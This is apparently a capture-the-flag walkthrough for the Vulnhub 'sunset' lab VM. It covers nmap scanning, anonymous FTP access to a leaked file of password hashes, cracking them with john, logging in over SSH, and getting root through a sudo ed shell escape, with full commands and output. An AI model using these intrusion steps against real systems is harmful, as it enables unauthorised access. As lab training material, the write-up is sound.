Vulnhub: sunset

This box is the first box in the sunset series. It is a very simple box, it only requires two steps to get root.

Scanning:

Finding the machine on the network

Nmap scan report for 192.168.56.130
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh

More Scanning:

Getting more details

crazyeights@es-base:~$ nmap -A -p- 192.168.56.130
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-29 17:25 EST
Nmap scan report for 192.168.56.130
Host is up (0.00010s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     pyftpdlib 1.5.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 root     root         1062 Jul 29  2019 backup
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.56.130:21
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)
[SNIP]

FTP:

Log in to ftp as Anonymous

crazyeights@es-base:~$ ftp 192.168.56.130
Connected to 192.168.56.130.
220 pyftpdlib 1.5.5 ready.
Name (192.168.56.130:crazyeights): anonymous
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Download the only file:

ftp> ls
200 Active data connection established.
125 Data connection already open. Transfer starting.
-rw-r--r--   1 root     root         1062 Jul 29  2019 backup
226 Transfer complete.
ftp> get backup
local: backup remote: backup
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
1062 bytes received in 0.03 secs (39.7634 kB/s)

Check out the file backup we found:

crazyeights@es-base:~$ file backup
backup: ASCII text

crazyeights@es-base:~$ cat backup 
CREDENTIALS:                                                                                                                                                                                                       
office:$6$$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.                                                                                                                  
datacenter:$6$$3QW/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/                                                                                                              
sky:$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0                                                                                                                     
sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/ 

The backup files appears to contain credentials of local users on the machine. We can use john to crack them.

Use john to crack the credentials:

The format of the hashes sha512crypt

crazyeights@es-base:~$ john --format=sha512crypt  sunset_hash 
Using default input encoding: UTF-8
Loaded 4 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 16 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
sky              (sky)
Warning: Only 39 candidates buffered for the current salt, minimum 64 needed for performance.
Warning: Only 56 candidates buffered for the current salt, minimum 64 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 47 candidates buffered for the current salt, minimum 64 needed for performance.
Warning: Only 49 candidates buffered for the current salt, minimum 64 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
cheer14          (sunset)
  • The credentials sky:sky are not for anything.

  • Trying the credentials sunset:cheer14 on ssh

crazyeights@es-base:~$ ssh sunset@192.168.56.130

Getting user.txt:

sunset@sunset:~$ ls
user.txt
sunset@sunset:~$ cat user.txt 
5b5b8e9b01ef27a1cc0a2d5fa87d7190

Privilege Escalation:

Finding what the user can run with elevated privileges:

sunset@sunset:~$ sudo -l
Matching Defaults entries for sunset on sunset:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sunset may run the following commands on sunset:
    (root) NOPASSWD: /usr/bin/ed

Looking up ed:

NAME
       ed - line-oriented text editor
  • Looking up ed on GTFObins

  • It can be used to break out from restricted environments by spawning an interactive system shell.

ed
!/bin/sh

Getting root:

sunset@sunset:~$ sudo ed
!/bin/bash
root@sunset:/home/sunset# cd /root
Getting root flag:
root@sunset:~# ls
flag.txt  ftp  server.sh
root@sunset:~# cat flag.txt 
25d7ce0ee3cbf71efbac61f85d0c14fe

FIN.